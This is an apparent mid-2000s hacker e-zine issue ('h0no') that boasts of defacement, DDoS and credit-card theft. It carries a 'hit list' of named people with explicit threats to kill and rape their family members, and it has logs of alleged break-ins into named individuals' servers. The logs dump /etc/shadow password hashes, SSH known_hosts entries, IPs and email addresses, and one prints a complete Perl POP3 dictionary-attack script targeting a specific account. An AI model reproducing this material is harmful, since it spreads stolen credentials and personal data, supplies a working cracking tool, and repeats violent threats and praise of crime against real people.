Copy Link
Add to Bookmark
Report
H0no Issue 03
1
#!/bin/rm-rf/yourself
###########################################################
## 0wn & rm 0wn & rm 0wn & rm 0wn & rm 0wn & rm ##
## ,-------------------------------------------------. ##
## >-------------------------------------------------< ##
## | -~- !Support!Zone-H!Support!HackThisSite! ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Deface [secfocus|frsirt|milw0rm] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- DDoS [*@efnet *@freenode] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Steal CC #s [and trade to us] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Trade xplz [on #darknet] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- !Support!Morning_Wood!Support!Jeremy! ~-~ | ##
## >-------------------------------------------------< ##
## `-------------------------------------------------' ##
## The hardest zine to rool the scene. ##
###########################################################
##:::::::::::::::::::::::::::::0ur:4sc11:4rt1st:1z:d34d::##
##::::: ###:: ###: #########:::::::::s0:fuck:4sc11:::::::##
##::::: ###:: ### ###::: ####:::::::supp0rt:b4nt0wn::::::##
##::::: ###:: ### ###:: #####: ###::::::: #########::::::##
##::::: ######### ###: ## ###: ########: ###:::: ###:::::##
##::::: ###:: ### ### ##: ###: ###:: ### ###:::: ###:::::##
##::::: ###:: ### #####:: ###: ###:: ### ###:::: ###:::::##
##::::: ###:: ###: #########:: ###:: ###: #########::::::##
##::::::::::::::::HAPPY:EASTER:IRC:LAMERZ::::::::::::::::##
###########################################################
## b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3 ##
###########################################################
## root # ls -al /home/rattle/ ##
## total 32 ##
## drwx--x--x 4 rattle rattle 512 May 28 19:30 . ##
## drwx--x--x 254 root wheel 7168 Jun 15 07:07 .. ##
## -rwx--x--x 1 rattle scream2 771 Mar 13 18:00 .cshrc ##
## -rwx--x--x 1 rattle scream2 1 May 28 19:34 .history##
## drwx--x--x 2 rattle scream2 512 Apr 5 21:59 .irssi ##
## -rwx--x--x 1 rattle scream2 255 Mar 13 18:00 .login ##
## -rwx--x--x 1 rattle scream2 165 Mar 13 18:00 .login_c##
## -rwx--x--x 1 rattle scream2 371 Mar 13 18:00 .mail_al##
## -rwx--x--x 1 rattle scream2 331 Mar 13 18:00 .mailrc ##
## -rwx--x--x 1 rattle scream2 801 Mar 13 18:00 .profile##
## -rwx--x--x 1 rattle scream2 276 Mar 13 18:00 .rhosts ##
## -rwx--x--x 1 rattle scream2 852 Mar 13 18:00 .shrc ##
## drwxr-xr-x 2 rattle rattle 512 May 28 19:30 www/ ##
###########################################################
## echo 'h0no rux' > .sig ##
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-##
## do yourself a favor and support h0no ##
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-##
## scp ~/.sig root@undef.net:/root/ ##
###########################################################
## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## 4R3!Y0U!R34DY!2!B3!H4Q3D???4R3!Y0U!R34DY!2!B3!H4Q3D?? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ##
###########################################################
## w4s th1nk1ng m4yb3 w3 sh0uld h4v3 4 d1ff3r3nt f0rm4t, ##
## m4yb3 m0r3 r3c1p3s 4nd h0w-t0s 1nst34d 0f unr3l4t3d ##
## 4rt1cl3s thr0wn t0g3th3r? ##
###########################################################
## 2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006 ##
###########################################################
## d0nt fuqn f0rg3t GSO! th3 f0rum w1th th3 m0zt h4ck3rz ##
## h4ck3rz th4t h4q! fuq 1r4n up! d3f4c3 4ll 0f th3m! ##
###########################################################
## MSG 10/23/04 at 02:32:56 PM AgntOrng (agntorng@hilary ##
## .duffs.bedroom) www.gmail.com l:radium.shells ##
## p:sha0lin ##
###########################################################
## H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R. ##
## agntorng 1z 0wn3d, 4ll 0f d4rp4 1n ru1nz, n0 0n3 ##
## th3r3 c4n h4q, x0rt suckz, 1z1k suckz, bl4cks3cur1ty ##
## b3tt3r w4tch th31r b4ckz, fuq 4ll y0u fuck1ng h4ck3rz ##
## wh0 d0nt tr4d3 w4r3z w1th uz. w3 g0t DDoZ 4 fr33 ##
###########################################################
## w3 fuq b0x3z up!!w3 fuq b0x3z up!!w3 fuq b0x3z up!! ##
## h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!! ##
###########################################################
1TZ 2006, Y34R 0F TH3 H0NO H1TL1ZT
~-~-~-~-~-~-~
H0NO H1T L1ST [y0u d0 _n0t_ w4nt t0 b3 0n th1s!]
-~-~- -~-~-~-~-~-~
0wn3d h4ndl3
-~-~- -~-~-~-~-~-~
[x] di0ad
[x] dvdman
[x] tal0n/skew/bandit/luck0elduck
[x] bx
[x] morning_wood
[ ] camel
[ ] agntorng
[ ] anyone from fuqn darpanet/iua who associates with above 2
-~-~-~-~-~-~-~-~-~
p30pl3 0n th1z l1zt n33d 2 f34r.
th3z3 h1t l1zt b1tch3z c4nt h1d3 f0r3v3r. y0u b3tt3r fuck1ng
ch4ng3 y0ur n4m3z 4nd m0v3 t0 4fr1c4.. c4us3 _W3_ _W1LL_
_FUCK_ _Y0UR_ _B0XEZ_ _UP_!_!_!_
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
now why would you want to be on thiz list?? you do not want to
be! h0no will fucking tear your life to fucking shreadz. w3 h4v3
3 truckl04dz 0f 0d4yz w1th a b0tn3t th3 s1z3 0f a 1st w0rld
c0untry. w3 h4v3 m1ll10nz 0f CC #'z. w3 w1ll p4y 0ff assassi4nz.
w3 h4v3 m0b c0nn3ct10nz t1ght3r th4n p3ng0. y0u w4nt t0 fuq1ng
d13? y0u w4nt y0ur l1f3 t0 3nd b3c4uz3 0f y0ur d0rky 0nl1n3 1rc
ch4tz? st3p th3 fuck up. m3nt10n h0no, y0u w1ll b3 0wn3d. th1nk
4b0ut d1zz1ng us 4nd y0u w1ll b3 k1ll3d. thr04t sl1t! try t0
1d3nt1fy us 4nd I w1ll F1ND Y0UR F4M1LY 4ND K1LL 3V3RY L4ST 0N3
0F TH3M!@# R4P3 & MURD3R Y0UR M0TH3R. BL00D, PUZZ, & CUM 0ZZ1NG
0UT 0F H3R FUCK1NG CUNT. D0 N0T! D0 N0T! D0 N0T FUCK W1TH H0NO!
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
1F 4NY0N3 0F Y0U TH1NK 1TZ 0V3R.. 1T 1Z N0T. Y0UR L1F3Z 4R3
F1N1SH3D! Y0U H4V3 FUCK3D W1TH WR0NG GR0UP 0F CR1M1N4LZ. FUCK1NG
D34D. W3 W4NT Y0U 0FF TH3 1NT3RN3T, W3 W4NT Y0U 0FF TH3 PL4N3T.
W3 _W1LL_ F1ND Y0UR 1NF0, W3 _W1LL_ FUCK1NG CRIPPL3 Y0U. 1T 1Z 4
PR0M1Z3.
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
[ARGH!@# I AM S0 M4D I BROK3 MY K3YB0ARD 0V3R MY H34D.]
-1.txt Intr0dukti0n
00.txt -~-~-~ s0rry silent, y0ur 0wn3d
01.txt -~-~-~ konewka roSUCKZ
02.txt -~-~-~ ri0t c0d3z
03.txt -~-~-~ sabre-security
04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1 (esser)
05.txt -~-~-~ tal0n g3tz h4x up!
06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!)
07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l...
08.txt -~-~-~ N3V3R 0WN3D!! rave. N3V3R 0WN3D!!
09.txt -~-~-~ 3th1cz@exploits.cx
10.txt -~-~-~ ethics@idefense.com
11.txt -~-~-~ 0day iCER r4pz
12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3.
13.txt -~-~-~ 1f b4b0 c4nt h4q th3m..
14.txt -~-~-~ majestic 4x3d.
15.txt -~-~-~ a pr0p0s4l 4 3b4y3rz
16.txt -~-~-~ kf g03z br0k3
17.txt -~-~-~ d4rp4n3t/d1s.0rg fuqt4rd s31z3d
18.txt -~-~-~ h3llm4n c4nt 4dm1n
19.txt -~-~-~ ptp un3th1c4l h4ck1ng
20.txt -~-~-~ how hack in pc
21.txt -~-~-~ di0ad 1z t04zt3d
22.txt -~-~-~ 0wlm4n4tt r3s1gnz
23.txt -~-~-~ nc/rx 0wn3d t0 fuq
24.txt -~-~-~ th3 f41l3d corestorm t34m.
25.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 2 (kunz)
26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd
27.txt -~-~-~ DVDMAN 1Z A FUQN FR34K!!@#
28.txt 0utr0
-1.txt -~-~-~ Intr0dukti0n
h0ly fuck1ng sh1t d1vin31nt! We g0t s0m3 w4r3z. 1tz t1m3 t0
us3 th3m. w3 s3r10uzly c0nc1d3r3d qu1t1ng h4ck1ng, but w1th0ut
us wh0 w0uld rm y0u? wh0 w0uld DoS y0u? wh0 w0uld tr4d3 y0ur
CC #s? Th1ngz 1n d4rkn3t h4v3 cr4wl3d t0 4 gr1nd1ng h4lt. n0
0n3 1s sh4r1ng th31r w4r3z 4nym0r3, s0 w3 h4d t0 m0v3 t0
4lt3rn4t1v3 m34nz t0 g3t th3 0d4y. th4nk g0d f0r b4nt0wn.
w3'v3 h1t th3 j4ckp0t 4nd us3d 4ll 0f 0ur p4yp4l and CC #s t0
purch4s3 s0m3 gr4d3-A w4r3z fr0m A z0ne-h fr13nd 4nd w3 3v3n h4d
th3 w1nn1ng b1d f0r 4n 3xc3l 0d4y unt1l 3b4y turn3d 1nt0 puss1ez.
gu3zz w3 w1ll h4v3 t0 fuzz s0m3m0r3 t0 m4k3th3 y34rly qu0t4.
~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
0n 4 t0t4lly d1ff3r3nt subj3ct, tw0 m0r0nz wh0 c4nt c0de
(agntorng & camel - rm 0n s1ght), y3t t4lk m0r3 sh1t th4n 1f
n3td3v & 4ll m3mb3rz 0f b4b0 c0mb1n3d 1nt0 0n3 sup3r
f3c3z-b4b3l-spr4y1ng m4ch1n3, 4r3 runn1ng 4r0und l1k3 s0m3
un3mpl0y3d w1r3d.c0m 3d1t0rz st4rt1ng sh1t 4ll 0v3r th3 pl4c3.
th3y kn0w w3 g0t th31r 1nf0z, th3y kn0w w3 g0t th3 w4r3z,
th3y kn0w th3y 4r3 d3f3ns3l3zz. th3n why w0uld 4ny0n3 w4nt t0
st3p up t0 us??
fuck w1th h0no 4nd y0u w1ll g3t d3lt w1th.
1t 1s pr0b4bly b3tt3r f0r y0ur b0x 1f y0u d0nt 3v3n r34d th1s z1n3.
00.txt -~-~-~ s0rry silent, y0ur 0wn3d
ircd@box187 ~ $ cat sn1ffl0g | grep \|silent
:d4rkgr3y!~phear@217.107.223.43 PRIVMSG FoxTrot- : |silent is m00 member
y0u truzt y0ur m3mb3rz d4rkgr3y? l3tz s33..
--------------------------------------------------------------------------------
18:53 <|silent> btw! there is a group outta there who own boxes from
security-team-ppl
18:53 <|silent> 2 m00 ppl already got owned and one teso guy got owned
18:53 <|silent> i know all the 3 ppl!
18:54 <|silent> i'm a bit scared they seem to be good i just hope they wont take
my server :/
18:54 <|silent> check http://h0h0.com/h0no.txt
18:54 <|silent> search for silent in the document
18:55 <cellular> heh, nice :P
18:55 <cellular> they wont manage it :P
18:55 <cellular> ill read it, i just fix the mail stuff first
18:57 <|silent> okay :)
19:00 <cellular> seems to work ;)
19:00 <|silent> :D
19:01 <cellular> hmmm
19:01 <cellular> which box is that ?
19:01 <cellular> drwx------ 2 rob rob 512 Sep 19 19:06 rob
19:01 <cellular> drwx------ 2 silent silent 512 Sep 20 06:16 silent
19:02 <|silent> it was the box from a m00 teammate
19:02 <cellular> ok :P
19:02 <|silent> from a fucking good security guy also! so i'm a bit scared ;/
19:03 <|silent> http://reflux.dyndns.org/
19:03 <cellular> lol, they write like fucking script-kiddies :P
19:03 <cellular> ok
19:03 <|silent> lol
19:03 <cellular> if they manage to get your root password it is no problem to
root it
19:03 <cellular> else it's HARD
19:03 <cellular> i don't think they will manage to do so
19:04 <cellular> since you use random return addresses
19:04 <cellular> most exploits require a pre-defined return address to occour to
work
19:04 <|silent> yea but.. they don't use bruteforce shit.. as the hono file
say ;/
19:04 <cellular> atleast overflow exploits
19:04 <|silent> they use useraccounts and gain root with it
20:20 <silentoo> but remember i'll add m00 and priv8 ppl
20:20 <cellular> then we'll degrade
20:20 <cellular> grrr
20:20 <cellular> fuck :P
20:20 <silentoo> hahaha :D
20:20 <silentoo> i add all the coder :D
20:20 <cellular> hahaha :P
20:20 <silentoo> so we can take their sources and advisories :D
20:20 <cellular> you've talked to them ?
20:20 <silentoo> yep
20:20 <cellular> yep :P
20:21 <silentoo> i announced in m00 members page that i'll got a server for the
coders :)
20:21 <cellular> then we root fbi.gov
20:21 <silentoo> hahaha
20:21 <silentoo> not from my server :D
20:21 <cellular> i will :P
20:21 <silentoo> but we have to think about something which copy all new
downloaded files to a special folder ;D
20:22 <silentoo> so that we can get it later :p
20:22 <silentoo> and we have to manipulate w and who so that ppl just see their
own processes
20:22 <silentoo> ehrm
20:22 <silentoo> own connections
--------------------------------------------------------------------------------
-~-~-~QOUTE-~-~-~ "so i'm a bit scared" - |silent -~-~-~QOUTE-~-~-~
digitaljunk:~$ uname -a; id
Linux digitaljunk 2.6.11.9-grsec-digitaljunk #2 Tue May 31 19:42:12 CEST 2005 i686 GNU/Linux
uid=1000(silent) gid=100(users) Gruppen=100(users)
digitaljunk:~$ cd Maildir/new/
digitaljunk:~/Maildir/new$ cat 1117650803.V302I40e229M467122.localhost.localdomain
Return-Path: <mailinglists@frsirt.com>
X-Original-To: silent@oral-sex.bz
Delivered-To: silent@oral-sex.bz
Received: from ns30617.ovh.net (ns30617.ovh.net [213.186.47.153])
by mail.digitaljunk.de (Postfix) with SMTP id 508F11AF2EE
for <silent@oral-sex.bz>; Wed, 1 Jun 2005 20:33:23 +0200 (CEST)
Received: (qmail 24578 invoked by uid 99); 31 May 2005 09:32:46 -0000
Date: 31 May 2005 09:32:46 -0000
Message-ID: <20050531093246.7663.qmail@ns30617.ovh.net>
To: silent@oral-sex.bz
Subject: [Exploits] Microsoft Windows Exploit (MS05-012), Zeroboard 4.x "preg_replace" Exploit
From: FrSIRT Alerts <mailinglists@frsirt.com>
X-Sender: <mailinglists@frsirt.com>
Mime-Version: 1.0
charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
----------------------------------------------------------------------
FrSIRT / Exploits and Codes
----------------------------------------------------------------------
The French Security Incident Response Team 24/24 & 7/7
----------------------------------------------------------------------
- 31 May 2005 -
----------------------------------------------------------------------
- Microsoft Windows COM Structured Storage Local Exploit (MS05-012)
http://www.frsirt.com/exploits/20050531.SSExploit.c.php
- Zeroboard 4.x "preg_replace" Remote Command Execution Exploit
http://www.frsirt.com/exploits/20050531.zeroboard.c.php
----------------------------------------------------------------------
Copyright © 2002-2005 - FrSIRT.COM
----------------------------------------------------------------------
#################################################################
## y0u w1ll n33d m0re th4n 0ld w4r3z t0 b3 s4f3! ##
#################################################################
digitaljunk:~/Maildir/new$ cd
digitaljunk:~$ cd coding/
digitaljunk:~/coding$ ls *
cokebot:
bf_tab.h blowfish.c blowfish.h cocain cokebot.c Makefile
dev-files:
blowfish-dev mysql-dev
done:
kaiten.c keyloger.c libirc.tar.gz uingen.c
php:
bleattern.php getfiletime.php nospam.php random_pass.php upload.php
urlvalid.php validate_mail.php
samples:
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
digitaljunk:~/coding$ head -n54 cokebot/cokebot.c
/*
****** PRIVATE EDITION ******
* *
* cokebot v.0.5 beta *
* © 2004 by |silent *
* *
*****************************
Changelog: 08.11.2004
+ added reconnect feature!
Changelog: 03.11.2004
+ added part command
+ added restart command (beta! too lazy to fork() ;D will do it soon!)
Changelog: 02.11.2004
+ added static login (eh? missing part cmd see TODO)
+ added chanlist (beta! chan/chankey support done!)
+ added userlist support
+ replaced join/op/deop/die/whoami commands for user-support
+ added userlist with authlevel
+ added support for older gcc
Changelog: 01.11.2004
+ rewrote command system
+ radnom nick/user/ident
+ updated conn()
+ added nick system (completation etc..)
+ blowfish cryption (beta)
+ segfault on quit fixed
+ fixed segfault on non-existing sites.conf
Changelog: 31.10.2004
+ radnom nick/user/ident
+ replaced sendtotarget()
+ static server/port
+ added commandlist by char
TODO:
- use linked lists for chans
- restart fork()
- better blowfish implementation
- doconf() to create conf-files if non exist
- crypted userlist
- crypted chanlist
- add modes etc.. to chanlist
- sitemanager
- admin control to modify chans/user
- useradd
- evilmode
- hidden process
- shellcommands
*/
digitaljunk:~/coding$ head -n5 done/keyloger.c
/*
Simple Keyloger - by |silent
*/
digitaljunk:~/coding$ head -n22 done/uingen.c
#include <stdio.h>
#include <stdlib.h>
void welcome() {
printf("[-] UINGen by |silent\n");
printf("[-] (c) 2004 |silent\n");
printf("[-] Contact: silent@oral-sex.bz\n");
printf("[-] Website: http://blackhat.tv\n");
}
void usage() {
printf("[-] Usage: ./uingen -f <first-uin> -l <last-uin> [-po]\n");
printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o uinlist.txt\n");
printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o brutelist.txt\n");
printf("[-] -f First UIN\n");
printf("[-] -l Last UIN\n");
printf("[-] -s Single UIN/Wordlist Mode [-w required]\n");
printf("[-] -w Wordlist [for single UIN mode only]\n");
printf("[-] -p Password [default: password]\n");
printf("[-] -o Outfile [default: outfile.txt]\n");
exit(1);
}
digitaljunk:~/coding$ ls samples/
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
#################################################################
## ~-~Wh3r3 4r3 th0s3 c0d3z......?? ##
#################################################################
digitaljunk:~$ cd htdocs/
digitaljunk:~/htdocs$ ls
213.239.211.98 digitaljunk.de greyhat.co.uk oral-sex.bz
digitaljunk:~/htdocs$ ls digitaljunk.de/content/vidz
afterhour-part1.avi
silent_owned.wmv
digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/exploits/
#################################################################
## ~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~ ##
#################################################################
digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/sources/
agobot3-0.2.1-pre4-priv.rar
blow
BlowSXT.rar
connectback.pl
hookbot.tgz
kaiten.c
libirc.tar.gz
mysql
pftp-src.0.11.4.tgz
shijack.c
sock.c
uingen.c
digitaljunk:~/htdocs$ cd
digitaljunk:~$ ./h00p1tup
digitaljunk:/home/silent# id
uid=0(root) gid=0(root) Gruppen=0(root)
digitaljunk:/home/silent# cd
digitaljunk:~# ls
allsql.sql
candicrew_home.tgz
cyrus-imapd-2.2.12.tar.gz
db-4.3.28
ebba_home.tgz
oidentd-2.0.7
pam_mysql-0.5.tar.gz
procmail-3.22
video.asp?video=V8-Chainsaw
awstats-6.5.tar.gz
cybersoft_inkasso_home.tgz
cyrus-sasl-2.1.21
db-4.3.28.tar.gz
install-report.template
oidentd-2.0.7.tar.gz
postfix-2.1.6
procmail-3.22.tar.gz
waterguide_home.tgz
awstats-6.5.tar.gz.1
cyrus-imapd-2.2.12
cyrus-sasl-2.1.21.tar.gz
dbootstrap_settings
Mail
pam_mysql
postfix-2.1.6.tar.gz
vhosts.conf.backup
webmin-1.200.tar.gz
digitaljunk:~# cat /etc/shadow
root:$1$T6gE9w0/$vo/dIs7jK7CP2lr.aRtMx/:12934:0:99999:7:::
daemon:*:12893:0:99999:7:::
bin:*:12893:0:99999:7:::
sys:*:12893:0:99999:7:::
sync:*:12893:0:99999:7:::
games:*:12893:0:99999:7:::
man:*:12893:0:99999:7:::
lp:*:12893:0:99999:7:::
mail:*:12893:0:99999:7:::
news:*:12893:0:99999:7:::
uucp:*:12893:0:99999:7:::
proxy:*:12893:0:99999:7:::
www-data:*:12893:0:99999:7:::
backup:*:12893:0:99999:7:::
list:*:12893:0:99999:7:::
irc:*:12893:0:99999:7:::
gnats:*:12893:0:99999:7:::
nobody:*:12893:0:99999:7:::
Debian-exim:!:12893:0:99999:7:::
sshd:!:12893:0:99999:7:::
mysql:!:12893:0:99999:7:::
silent:$1$72YyIyox$67vyj7jfLUWeFYA24dWOl1:12934:0:99999:7:::
breath:!:12934:0:99999:7:::
upload:$1$gVq9vOrJ$qrQgeXNVHjX.FFi4xhK9K/:12934:0:99999:7:::
hillside:$1$gfXquKfq$mWkMvMvKY3sck.PJstZqp0:12934:0:99999:7:::
bind:!:12934:0:99999:7:::
tuborg:$1$lhO4VKnt$yx9/34El7HK5m5KS5jUFe/:12934:0:99999:7:::
cyrus:$1$mk7JsS6t$/lGzf9WhyOT9ZdotH.ajN.:12934:0:99999:7:::
postfix:!:12934:0:99999:7:::
dovecot:!:12935:0:99999:7:::
tech:$1$SYf8xzC/$enjJt2k9hqxdxiUogdD3D/:12935:0:99999:7:::
marius:$1$mtWc/oSj$czow9rYQcy3EPrtRfTQHX0:12935:0:99999:7:::
jonas:$1$i9wTlJ7r$4TbucpQL.uG6RmDgkq9uP.:12936:0:99999:7:::
bjerkis:$1$Z8TcITtK$KvOghtp2AYJCQLogkHovh1:12936:0:99999:7:::
#################################################################
# QOUTE ~-~ "18:55 <cellular> they wont manage it :P" ~-~ QOUTE #
#################################################################
Th4nkz t0 |s1l3nt f0r st34l1ng pr1v4t3 c0d3z fr0m h1z t34m-m4t3z
(m00 & priv8sec) & f0r l3tt1ng us t4k3 1t s0o0o e4s1ly! w4tch f0r
silent_owned2.wmv t0 dr0p.
Whois silent?
08:34 -!- |silent [silent@divinity-38478E7B.de]
08:34 -!- ircname : h0no I've been owned!
08:34 -!- channels : @#darpa @#m00 @#teengaysex
08:34 -!- server : irc.blackhat.ru [m00 IRCd]
08:34 -!- : is a Secure Connection
08:34 -!- idle : 0 days 2 hours 15 mins 34 secs
08:34 -!- End of WHOIS
01.txt -~-~-~ konewka roSUCKZ
konewka fr0m roSEC g3tz 4x3d, m4yb3 h3 sh0uld sp3nd m0r3 t1m3 th1nk1ng up a
b3tt3r p4zzw0rd r4th3r th4n tr4d1ng cr3d1t c4rdz 4nd sh1tty s0urc3. 1t 0nly
t00k hydr4 a 200kb d1c t0 cr4q h1z p4zz. h1z c0d3z 4r3 m0r3 p01ntl3zz th4n
a hwa-security r3l34z3.
login as: konewka
konewka@83.23.44.188's password:
Last login: Wed Sep 20 23:10:59 2005 from h.0.n.o
+ Welcome aboard +
konewka@olek:~$ uname -a;id
Linux olek 2.4.30-ow3 #1 Tue Sep 13 18:45:51 CEST 2005 i686 unknown
uid=1000(konewka) gid=100(users) groups=100(users),10(wheel)
konewka@olek:~$ ls -al
total 3772
drwx-----x 14 konewka users 4096 Sep 17 18:03 .
drwxr-xr-x 5 konewka users 4096 May 24 15:28 ..
-rw------- 1 konewka users 6173 Sep 20 16:20 .bash_history
drwx------ 3 konewka users 4096 Sep 4 12:34 .gg/
drwx------ 3 konewka users 4096 Oct 29 2004 .irssi/
drwxr-xr-x 3 konewka users 4096 Sep 14 14:39 .mc/
drwx------ 2 konewka users 4096 Aug 22 15:59 .screen/
-rw-r--r-- 1 konewka users 3394 May 5 2004 .screenrc
drwx------ 2 konewka users 4096 May 30 2004 .ssh
drwx------ 4 konewka users 4096 Apr 10 15:07 b0x/
-rw-r--r-- 1 konewka users 205 Aug 13 22:10 clear_dict.pl
-rwxr-xr-x 1 konewka users 12224 Aug 8 22:13 mcrack
drwxr-xr-x 10 konewka users 4096 Mar 16 2005 meggdrop
drwxr-xr-x 2 konewka users 4096 Aug 9 22:28 mgg_hijack
drwxr-xr-x 2 konewka users 4096 May 23 2004 mlamebot
-rwxr-xr-x 1 konewka users 621 Aug 13 01:54 mmcrack.pl
drwxr-xr-x 2 konewka users 4096 Aug 10 2004 n0f
-rw-r--r-- 1 konewka users 571856 Aug 12 19:35 mperl5.zip
-rw-r--r-- 1 konewka users 2154218 Aug 13 01:56 polish
-rw-r--r-- 1 konewka users 1022183 Aug 13 22:09 polish.clear
-rwxr-xr-x 1 konewka users 1498 Jan 8 2005 relay.pl
drwxr-xr-x 2 konewka users 4096 Aug 11 20:02 smb_h03
-rw-r--r-- 1 konewka users 21 Jul 22 22:07 temporary
drwxr-xr-x 2 konewka users 4096 Aug 3 21:57 w0rkz
konewka@olek:~$ head -n4 relay.pl
#!/usr/bin/perl -w
# relay.pl C-class smtp relay scanner by konewka <konewka@localdomain.ru>
# use ./relay.pl 2> relay_servers to log only smtps with relaying.
# This is edu purpose only. enjoy
konewka@olek:~$ cat mcrack.pl
#!/usr/bin/perl -w
use Net::POP3;
# setup
my $host = "poczta.onet.pl";
my $user = "malgosia181";
my $dict = "polish";
print "mrack.pl by konewka\n";
open(WORDLIST, $dict);
$pass = <WORDLIST>;
$| = 1;
while ($pass ne "") {
$pop3 = Net::POP3->new($host); die "Can't connect !" unless $pop3;
$pass = substr($pass, 0, length($pass)-1);
$cracked = $pop3->login($user, $pass);
if (defined($cracked)) {
print "\nCracked ! Password = ".$pass."\n";
$pop3->quit();
close(WORDLIST);
exit 1337;
}
else {
print ".";
}
$pass = <WORDLIST>;
}
printf "I guess nothing was cracked this time.\n";
konewka@olek:~$ cd .ssh
konewka@olek:~/.ssh$ cat known_hosts
192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtZ8HOFBxujq/T3Mnnv2uGAdSdu6eERdVMiUlwJzmwuyzPgAn/taXzPfMgCLM9QfEBzuc1K20+h1jn0MPPGavQfmuBcShz+zPSUA3IAbqjyUvHtO+J3ODDweDl2wy3qGefrBAhlTSQTphjb/cKRO3PLztHd2qM14xB1svC8WU81c=
rosec.segfaulted.com,80.97.66.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0hwGICbJvrIfgezT5j4RtAF1cW0sWmRxr5Ym21pHg4Bn7ujHXdogSQJenI6GeJ4q2FI4mfVVui+Ce7VKKZs3YYeR/lIvbJh5p6cjjmw2oJyIMjp3dsRd3QZnM1IrDt9tZCVyHWALwT2GyH7sFwS5YiqQczBvPUcssEx1+//z3r0=
ffs.ath.cx,82.224.195.151 ssh-dss AAAAB3NzaC1kc3MAAAEBAKj6I/LFVpofk3d9f65Cr/CjViVBA64+aaIfSk2h0Shz09TT4SdSLpDh6uMh2UX+SX/4pMq3ke2tmUzY7NYt6ZhOge7sOgsIF0S/bRFyGO25Ow58AWPDTk4Z/B93wSc31gE+oiLi9fIrt0JJwTEbswQgmMjnGjiV9QB0OB1XbevgfTBtsxc+DtbuXAWsA9/JWthIXf3UlgHj20hRpTgp4q6r00bD0efmSbyqWq0U+rTKHS8dFAnLiRrvfkLzkToDjdffr/MFj9gJI+Z04Aki25KzgFW4i2imep5foq08/9zanOQ/OMSfW6tdEXGBLUXJQhEOUUUGHvXuPaTnGHOktbsAAAAVAKLGZ4KLasiL6g8XJ0msw56RckzZAAABAEBsfr3TR7l1Ld7PWc7+o/02rE+INHk/hTomKc6tizNo0bF7W1IvjnmX6q17Tj8M1rV6/I1QpYMcfCNC7UZhoMmq//8lum02v+k1LXNjbV+R85V9hYkPYfqzEHpER4hwo/aqelzV9/gVLRxYurRdKg2DqOHEwV/BlKpk/hL0NYsA3RHPdomsQmqBtAYiPeDGUkI3l7lTLO+Vnvhp00Re4KcNzrYsWp3aCF+JcqJ5w8VPJEgoWQI76p7PW5Croaaiebh3d7Mn92wCSaaL0+W3JxY0ZFijJPSFEQQYjrLfASC+a3yi/em8MeAaBc4OrC+Lod7SQHz2AfsdRwAtEYwIfPcAAAEBAIJVSztDyUD8BHUfSfN1yV1vVDcMYY98wpDmluDRO1PEGnGB81y/HJKATKU8VXd7xxJFlhQL92HVohu5Fcz3WiPtZGNw2bcZJ0+s+1ormLgmgcBeWIIG79anXi+JBUugjaf1fzviRmcwChRLU6ameKFWDv4GNW3u4XQEQheN4XbLKhIFT774cFtadTFB4qRTxyh/qOyw6eeW6RzjCaHydVgTY8PzffU13yyoKwsb8MZz9W3G3cicsbZCUKcSPs5OZ8Z9kp4uz4lwAWcoaz8zVlAjxLy62PObmb40qSaLfHUKvvxNs5EQEqirr/wtxpdpPDaiYDaggYECgwYJ6k/11/k=
konewka@olek:~/.ssh$ cd ..
konewka@olek:~$ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucppublic:
nobody:x:99:99:nobody:/:
